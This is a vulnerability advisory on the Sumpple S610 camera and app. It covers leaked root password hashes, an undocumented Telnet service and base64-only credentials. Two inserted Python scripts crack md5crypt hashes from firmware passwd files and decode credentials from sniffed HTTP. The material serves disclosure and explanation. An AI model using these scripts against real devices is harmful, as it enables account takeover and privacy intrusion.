Vendor: Sumpple
Vendor URL: http://www.sumpple.com
Versions affected: S610 firmware 9063.SUMPPLE.7601 - 9067.SUMPPLE.7601; Sumpple IP Cam Android V1.1.33 - V1.11; iOS 1.51.5986 (previous versions are also likely to be affected)
Systems Affected: Sumpple S610 WiFi Wireless PTZ Outdoor Security Video Network IP Camera; Sumpple IP Cam Android and iOS mobile application.
Author: Sebastian Parker-Fitch (@scorpioitsec)
Advisory URL / CVE Identifier: CVE-2019-12085, CVE-2019-16727
Risk: High
Vendor Communication
2019-02-27: Responsible Vulnerability Disclosure process initialized
Between February 2019 and May 2019: Ongoing email contact between NCC Group and Sumpple to follow up the process
2019-05-13: MITRE contacted and CVEs requested
2019-05-14: MITRE assigned CVE-2019-12085, CVE-2019-16727
2019-05-17: Chinese CERT Team contacted
2019-09-09: Chinese CERT Team dealing with the vendor
2019-11-28: NCC Group Advisory released
Summary
It was possible to use an authenticated web or mobile application user session to access the Sumpple camera as the root user, by downloading a firmware image that contains two different hashes of the root user’s password. It was possible to crack the password hashes and access the camera as the root user by authenticating to an undocumented Telnet service.
The Sumpple IP Cam mobile application is used to remotely view and reconfigure the camera(s); all traffic between the application and the camera was transmitted in cleartext, with the credentials protected only by base64 encoding. Once decoded, this disclosed the username, password, user ID and camera-specific password.
Location
The credentials were located in the /etc/passwd and /etc/passwd~ files of the extracted firmware image. The root password was hashed with the obsolete descrypt and md5crypt algorithms.
Impact
Once access to the Telnet service had been gained it was possible to execute commands on the camera as root; for example, running reboot at the command line ended the sessions of all users of the web interface. Because Telnet transmits credentials in plaintext, users on the same wired or wireless network could sniff the traffic and recover the root password.
The lack of encryption between the mobile clients and the camera allowed the camera credentials to be intercepted over wireless networks. This is expected to allow malicious users to add other users' cameras to their own accounts, degrading the privacy of those users.
Details
Downloading the firmware image can be performed by a user logged into either the camera's local web interface or the mobile application. After logging in, the user can check the current version of the camera on the Device Info page of the web interface.
The camera issued a GET request to the vendor's server to check whether the installed firmware version was older than the newest available version. When a new firmware image was available, the download link could be copied and accessed directly, as it was not password-protected; anyone with knowledge of the URL could retrieve the image.
Once downloaded, the firmware was trivially extracted with the Binwalk tool as it was not encrypted. This exposed the layout of the file system, including the passwd and passwd~ files, from which the hashes were extracted and trivially cracked owing to the use of legacy, weak hashing algorithms.
An Nmap scan revealed that TCP port 23 (Telnet) was open; with the recovered password a user could log on to the camera as the root user.
Nmap scan report for 192.168.1.119
Host is up (0.0013s latency).
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
MAC Address: 54:CD:EE:04:F4:FE (ShenZhen Apexis Electronic)
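The extract-and-crack step above, written out as an added Python example; this is not NCC Group's tooling and not the vendor's code. It implements md5crypt itself so that it runs offline, recognises descrypt entries by their 13-character shape, and names the hashcat mode and John the Ripper format to hand those to. The passwd contents, the salt "XyZw1234", the word "camera1" and the wordlist are constructed for illustration and are not the values recovered from the Sumpple image.

```python
#!/usr/bin/env python3
"""Pull password hashes out of passwd/passwd~ files recovered from an extracted
firmware image, classify the hash scheme, and dictionary-attack the md5crypt
($1$) ones.  descrypt and sha-crypt hashes are identified and handed off."""
import re
from hashlib import md5

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DESCRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")   # 2-char salt + 11-char digest
PREFIXES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt"}
# Tool handoff for schemes this script does not crack itself.
CRACKERS = {"descrypt": "hashcat -m 1500 / john --format=descrypt",
            "sha256crypt": "hashcat -m 7400 / john --format=sha256crypt",
            "sha512crypt": "hashcat -m 1800 / john --format=sha512crypt"}


def md5crypt(password: str, salt: str, magic: str = "$1$") -> str:
    """Pure-Python md5crypt (the FreeBSD/Linux $1$ scheme)."""
    pw, s = password.encode(), salt[:8].encode()
    ctx = md5(pw + magic.encode() + s)
    alt = md5(pw + s + pw).digest()
    for i in range(len(pw)):                 # mix in len(pw) bytes of the alternate sum
        ctx.update(alt[i % 16:i % 16 + 1])
    i = len(pw)
    while i:                                 # the scheme's bit-walk over len(pw)
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                    # fixed 1000-round stretching
        c = md5(pw if i & 1 else final)
        if i % 3:
            c.update(s)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    out = []
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = (final[a] << 16) | (final[b] << 8) | final[c]
        for _ in range(4):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return f"{magic}{salt[:8]}${''.join(out)}"


def classify(h: str) -> str:
    for prefix, name in PREFIXES.items():
        if h.startswith(prefix):
            return name
    if DESCRYPT_RE.match(h):
        return "descrypt"
    if h in ("", "x", "*", "!"):
        return "none"                        # shadowed or locked: nothing to crack
    return "unknown"


def extract_hashes(text: str) -> dict:
    """{user: hash} for every passwd/shadow-style line carrying a crackable hash."""
    found = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and classify(fields[1]) not in ("none", "unknown"):
            found[fields[0]] = fields[1]
    return found


def crack_md5crypt(h: str, wordlist):
    """Return the wordlist entry that reproduces h, or None."""
    _, _, salt, _ = h.split("$", 3)
    for word in wordlist:
        if md5crypt(word, salt) == h:
            return word
    return None


def audit(files: dict, wordlist) -> dict:
    """(file, user) -> (scheme, cracked word or handoff hint) over several files."""
    results = {}
    for name, text in files.items():
        for user, h in extract_hashes(text).items():
            scheme = classify(h)
            if scheme == "md5crypt":
                results[(name, user)] = (scheme, crack_md5crypt(h, wordlist))
            else:
                results[(name, user)] = (scheme, CRACKERS.get(scheme))
    return results


# Constructed sample files, shaped like the /etc/passwd and /etc/passwd~ the
# advisory describes.  The md5crypt entry is generated here for the word
# "camera1"; the descrypt-shaped string is a syntactic placeholder, not a real
# hash, so it is only classified, never cracked.
SAMPLE_FILES = {
    "passwd": "root:" + md5crypt("camera1", "XyZw1234") + ":0:0:root:/root:/bin/sh\n"
              "daemon:x:1:1:daemon:/usr/sbin:/bin/false\n",
    "passwd~": "root:ab/C3dEfGhIjK:0:0:root:/root:/bin/sh\n",
}
WORDLIST = ["123456", "admin", "password", "camera1", "ipcam"]

if __name__ == "__main__":
    for (fname, user), (scheme, res) in audit(SAMPLE_FILES, WORDLIST).items():
        print(f"{fname}:{user}  {scheme:12s} {res}")
```

Against a real image the inputs would be the etc/passwd and etc/passwd~ files under the directory `binwalk -e` produces; the salt and the digest in a $1$ hash are separated by `$`, so `crack_md5crypt` only has to re-run the scheme with each candidate word and the recovered salt, which is exactly why unsalted or weakly stretched legacy schemes fall so quickly to a wordlist.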
The mobile application's initial options were to register an account or log in to remotely administer the camera, or to add a new camera. The traffic could be intercepted by setting up a rogue wireless network and joining both the camera and the client devices to it. Once routing was verified it was possible to conduct a man-in-the-middle attack using the Ettercap and Bettercap tools to poison the ARP cache of either the camera or the client devices and sniff their traffic. This exposed the outbound connections from the poisoned devices, allowing HTTP and Telnet traffic to be intercepted.
As the traffic was transmitted to the server over cleartext HTTP, the HTTP requests and responses could be read directly. This showed that base64 encoding, not encryption, was used for the username, password and app token. The response included the username, numerical user ID, camera alias, model, name, device ID, unique ID, camera password and permission level.
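What an attacker on the path gets from that capture, as an added Python example; this is not the advisory's tooling and the request line, parameter names (user, pwd, token, campwd and the rest) and JSON response are constructed stand-ins, not the real Sumpple API. The point it makes is that base64 is a reversible encoding: every "protected" field decodes with no key at all.

```python
#!/usr/bin/env python3
"""Recover credentials from intercepted cleartext HTTP where the client has
only base64-encoded them.  Base64 is an encoding, not encryption."""
import base64
import binascii
import json
import re
from urllib.parse import parse_qsl, urlsplit

B64_RE = re.compile(r"^[A-Za-z0-9+/]{4,}={0,2}$")
SECRET_KEYS = re.compile(r"(pass|pwd|token|secret)", re.I)


def try_base64(value: str):
    """Decoded text if value is well-formed base64 of printable UTF-8, else None.
    Short alphanumeric strings can look like base64; the UTF-8 check weeds most out."""
    if not B64_RE.match(value) or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def parse_request(raw: str):
    """Split an HTTP/1.x request into (method, path, query params, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _ = lines[0].split(" ", 2)
    parts = urlsplit(target)
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    headers = {k.strip().lower(): v.strip()
               for k, v in (l.split(":", 1) for l in lines[1:] if ":" in l)}
    return method, parts.path, params, headers, body


def decode_fields(fields: dict) -> dict:
    """Replace every base64-looking string value with its plaintext."""
    out = {}
    for k, v in fields.items():
        dec = try_base64(v) if isinstance(v, str) else None
        out[k] = dec if dec is not None else v
    return out


def harvest(raw_request: str, raw_response_body: str) -> dict:
    """Decode the request's query string and the JSON response, and flag the
    fields whose names suggest a credential or session secret."""
    _, path, params, _, _ = parse_request(raw_request)
    req = decode_fields(params)
    resp = decode_fields(json.loads(raw_response_body))
    leaked = {k: v for k, v in {**req, **resp}.items() if SECRET_KEYS.search(k)}
    return {"path": path, "request": req, "response": resp, "leaked": leaked}


# Constructed capture: a login request and its reply, shaped like the exchange
# the advisory describes.  Field names and values are invented for this example.
SAMPLE_REQUEST = (
    "GET /api/login?user=YWxpY2U=&pwd=U3VtbWVyMjAxOQ==&token=dG9rLTQy HTTP/1.1\r\n"
    "Host: cloud.example.invalid\r\n"
    "User-Agent: IPCam-App/1.1\r\n"
    "\r\n"
)
SAMPLE_RESPONSE = json.dumps({
    "userid": 1042,
    "user": "YWxpY2U=",
    "alias": "ZnJvbnQgZG9vcg==",
    "model": "S610",
    "name": "Sumpple IP Cam",
    "did": "ABCD-1234",
    "campwd": "Q2FtIzEyMzQ=",
    "perm": "admin",
})

if __name__ == "__main__":
    result = harvest(SAMPLE_REQUEST, SAMPLE_RESPONSE)
    for key, value in result["leaked"].items():
        print(f"{key}: {value}")
```

Run against a capture such as the Bettercap or Ettercap sniff described above, the only work left for the attacker is splitting the HTTP stream; no key recovery is involved, which is why the fix has to be transport encryption rather than a different encoding.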
Recommendation
Affected users should open the 'Network' tab of the camera web interface and filter access to TCP ports 23 and 80.
When using the mobile application, users should connect either over a cellular connection (e.g. 3G/4G) or over a VPN when on a wireless network.
About NCC Group
NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionising the way in which organisations think about cyber security.
Written by: Sebastian Parker-Fitch
Published date: 28/11/2019